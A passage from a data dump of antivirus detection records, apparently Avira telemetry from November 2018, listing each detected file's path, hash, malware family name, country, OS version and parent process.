  Row(detection=Row(filename='zipdll.dll', filepath='D:\\DROPSCRIPTV1.8\\EDITOR GAMBAR ( RENAME, WATERMARK, DLL )\\FSViewer64\\ZipDll.dll', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='fd43055f378b3429f3ce0903e2e20d23b0cfb3d7bf4c2bd0bb19e337070c8ba3', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:52:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='crashreporter.exe', filepath='C:\\ProgramData\\BlueStacksGameManager\\xulrunner-sdk\\crashreporter.exe', filesize=192000, name='W32/Neshta.A.#M1.#R1'), hash='dc9cb5b65aab576b90a51065f7ded2256d6fc2c6ff525c10d8d416faa0b87da9', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='I:\\PROGRAMAS\\PNGoo.0.1.1\\PNGoo.exe', parentsize=91136, timestamp='2018-11-02T04:16:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='passmarkkeyboardtest.exe', filepath='C:\\Users\\X\\Desktop\\Hirens 7\\HBCD\\Programs\\PassMarkKeyboardTest.exe', filesize=64000, name='TR/Agent.gpono.#M1.#R1'), hash='a226c44141c53061f71957bc34dbfface47bd10230578a172e45e5b267b295b6', metadata=Row(cmdline='\\\\\\/Install \\\\\\/Update \\\\\\/Quiet  \\\\\\/InstallFile \\\\\\"C:\\\\\\\\$WINDOWS.~BT\\\\\\\\Sources\\\\\\\\Install.esd\\\\\\" \\\\\\/progressCLSID 06cfe2c4-1c5b-4002-bca2-d0667fe5b626 \\\\\\/ReportId {C3BD4254-41A1-4918-A51A-1C74251DF7F3}.201 \\\\\\"\\\\\\/ClientId\\\\\\" \\\\\\"1eeffbbd-5a32-4a02-af22-5323b7db6150\\\\\\" \\\\\\"\\\\\\/CorrelationVector\\\\\\" \\\\\\"pR8P7z\\\\\\/JgEW3X9Vd.5.1.2\\\\\\" \\\\\\/WUCachedFileName \\\\\\"17134.1.180410-1804.rs4_release_CLIENTCONSUMER_RET_x86FRE_en-us.esd\\\\\\"', country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\$WINDOWS.~BT\\Sources\\SetupHost.exe', parentsize=697528, timestamp='2018-11-02T20:27:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T11:40:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{07D3CB25-7F85-41AB-823A-1A37E2FE5C1D}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='d316f0bd11ab26a84824a6a72f555b5ee2236cb231251c67590600f3765bb70d', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:40:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='bd3e5cecfbe2142822073d37e797ecaa93ba2c8c23c927769f699c79ad00103f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T18:50:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='deviceeject.exe', filepath='d:\\windows\\system32\\DeviceEject.exe', filesize=576000, name='W32/Virut.Gen.#M1.#R1'), hash='a401f4bd5ec3a1d44fbc12cc3eeefbe2f2d606320d4b464dc8acde15049bc942', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:51:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setscuvalues.exe', filepath='C:\\Program Files (x86)\\Fujitsu\\ServerView Suite\\Agents\\UpdateAgent\\SetScuValues.exe', filesize=320000, name='W32/Neshta.A.#M1.#R1'), hash='a2056c3148f4c20155e6022a546f4060d0c0c06e888f92bb6edd4fc5c68dfe04', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=45056, timestamp='2018-11-02T07:30:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dosyalarım.exe', filepath='G:\\Dosyalarım.exe', filesize=320000, name='TR/Patched.Ren.Gen.#M300.#R4976'), hash='be2e60a43d2533a585c6db1626abfab89e9c06272f03d3de6ceaec52b6de9cd0', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4064320, timestamp='2018-11-02T11:50:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221425-557e907d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221425-557E907D', filesize=64000, name='TR/Agent.64000.186.#M1.#R1'), hash='eb90c5e7b45131be3382699058912c5f84fa35c868f1202c3acd1ca54cb65080', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:14:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00004e51', filepath='C:\\Windows\\Temp\\tmp00007c05\\tmp00004e51', filesize=12800000, name='TR/Patched.Ren.Gen2.#M300.#R100581'), hash='c4c7b39b8c4e3fe75aef020c9220479ec080c2a18b45b8f6a7c82343b317565e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T10:41:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023a614', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023a614', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:58:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00297528', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00297528', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:45:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:12:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='icomboobject.dll', filepath='C:\\Microgaming\\Poker\\BetssonMPP\\control\\icomboobject.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='c680cd43a2a262cb06a2d0c8f5b61dd8ddb013814b6c32f7736db553f6f6b66a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Microgaming\\Poker\\BetssonMPP\\mppoker.exe', parentsize=1289976, timestamp='2018-11-04T11:06:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023c7aa', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023c7aa', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:34:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029403d', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029403d', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:34:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023b479', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023b479', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:13:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00239350', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00239350', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:38:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fax_msg453-699-9474.doc', filepath='C:\\TMP\\01\\_virs\\fax_msg453-699-9474.doc', filesize=64000, name='W97M/Agent.960461927.#M1.#R1'), hash='fb467c5ef6a5a7ce1db165b458c64aff8d5ca5e813712201abe7d73a7b0048b7', metadata=Row(cmdline=None, country='SK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:48:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f7ebe4b5dc142163af430333a96d45443f54059a605e6edd78e600b325e82c5c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\F7EBE4B5DC142163AF430333A96D45443F54059A605E6EDD78E600B325E82C5C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f7ebe4b5dc142163af430333a96d45443f54059a605e6edd78e600b325e82c5c', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:55:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:46:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:45:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0001933.exe', filepath='\\\\?\\J:\\System Volume Information\\_restore{28F3C84F-9236-484A-A602-3A7F1B032E64}\\RP7\\A0001933.exe', filesize=128000, name='HEUR/AGEN.1008649.#M1.#R1'), hash='ee192e508d114a0f99d24291301cdf7e0c4f9bf733288ad26cd1ac00d4818299', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:41:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='e056c6741ecdb2ecc21a04ab350b0591cd30f50be4a2f6b64c9184a192fa4733', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T03:19:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181202-141836-b3a05e44', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_39ad4ce7\\AVSCAN-20181202-141701-A91A1C6D\\AVSCAN-20181202-141836-B3A05E44', filesize=256000, name='TR/Dropper.Gen.#M1.#R1'), hash='e4cc5421d9dd114b2d159516e4ed5948e075c4aed15602073dcf9a857059941a', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T16:46:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msvcrmtk.dll', filepath='E:\\PACM00_11_A.11_180410_A7D06FC5\\1111\\刷机工具\\MSVCRMTK.DLL', filesize=192000, name='TR/Black.Gen2.#M300.#R100338'), hash='fff0bae1269aaf7bf1db339362c218ba9a2a9512b06a583eb281fd59858bead7', metadata=Row(cmdline='-r', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Tencent\\QQPCMgr\\12.14.19590.218\\QQPCRTP.exe', parentsize=307152, timestamp='2018-11-01T11:29:08Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='hp1005sm.exe', filepath='C:\\Program Files\\Hewlett-Packard\\LaserJet M1005 Drivers\\HP1005SM.exe', filesize=256000, name='W32/Sality.AT.#M0.#R0'), hash='5d01a6f63828b94c1f1bbf36e2d171cf9c670508a84708e513aa8bce760cb255', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='3', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T06:27:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='d3d8.dll', filepath='D:\\PlayConquer\\PlayConquer\\PATCHDATE\\Env_DX8\\d3d8.dll', filesize=1920000, name='HEUR/AGEN.1034484.#M1.#R1'), hash='22048a7949f5a6188a639c61ae13ef41d9ee2f0f76f54ea7f82f31b0f0de0a3a', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:07:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ai.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL14\\AI\\AI.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='27e946580ebd3a67750c862d3cce6b9573f1e3e495ebccfe9a67f563208fdf59', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='utilman.exe', filepath='E:\\WINDOWS\\ServicePackFiles\\i386\\utilman.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='4902ac343fff8549e4d76c4c80cc017e021345e753ebf341a575dcfbf398ed57', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:38:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:47:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2373784, timestamp='2018-11-02T19:19:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-163234-02f7f090', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_731bb7c6\\AVSCAN-20181102-163226-01635032\\AVSCAN-20181102-163234-02F7F090', filesize=256000, name='TR/Agent.256000.C.#M1.#R1'), hash='185c137566c02057db28f1eef903b17754be7f63a38d74984dae684e62bf79c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:32:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='openal32.dll', filepath='C:\\Users\\X\\Documents\\AT launcher\\Instances\\PixelmonCraft\\bin\\natives\\OpenAL32.dll', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='258563a4fd300e5e2a1752923de7286886ffc712d7c6a4f523a34ba2bcd4cdc6', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T17:02:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:22:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0b6112c21aae542cc56c191f1626d4a5cb4ce740e9bdecbd7cb638b507eff17b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\0B6112C21AAE542CC56C191F1626D4A5CB4CE740E9BDECBD7CB638B507EFF17B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0b6112c21aae542cc56c191f1626d4a5cb4ce740e9bdecbd7cb638b507eff17b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:17:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-074244-0b3cc7ca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_39e889cd\\AVSCAN-20181102-074221-066F8179\\AVSCAN-20181102-074244-0B3CC7CA', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:42:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='csrss.exe', filepath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe', filesize=1344000, name='TR/Crypt.FKM.Gen.#M300.#R581'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:04:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T14:22:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='59ab2184f2377018262473ace1914b28815980e336dbfdf2bf94c4ea79380e82', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\59AB2184F2377018262473ACE1914B28815980E336DBFDF2BF94C4EA79380E82', filesize=148000, name='TR/Crypt.ZPACK.Gen7.#M300.#R600521'), hash='59ab2184f2377018262473ace1914b28815980e336dbfdf2bf94c4ea79380e82', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:57:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='online.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\EA Help\\Online\\Online.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:57:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-205208-d2532a96', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14e04295\\AVSCAN-20181102-205128-CAA7FD8B\\AVSCAN-20181102-205208-D2532A96', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T19:52:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:39Z'), dt=datetime.date(2018, 11, 2)),
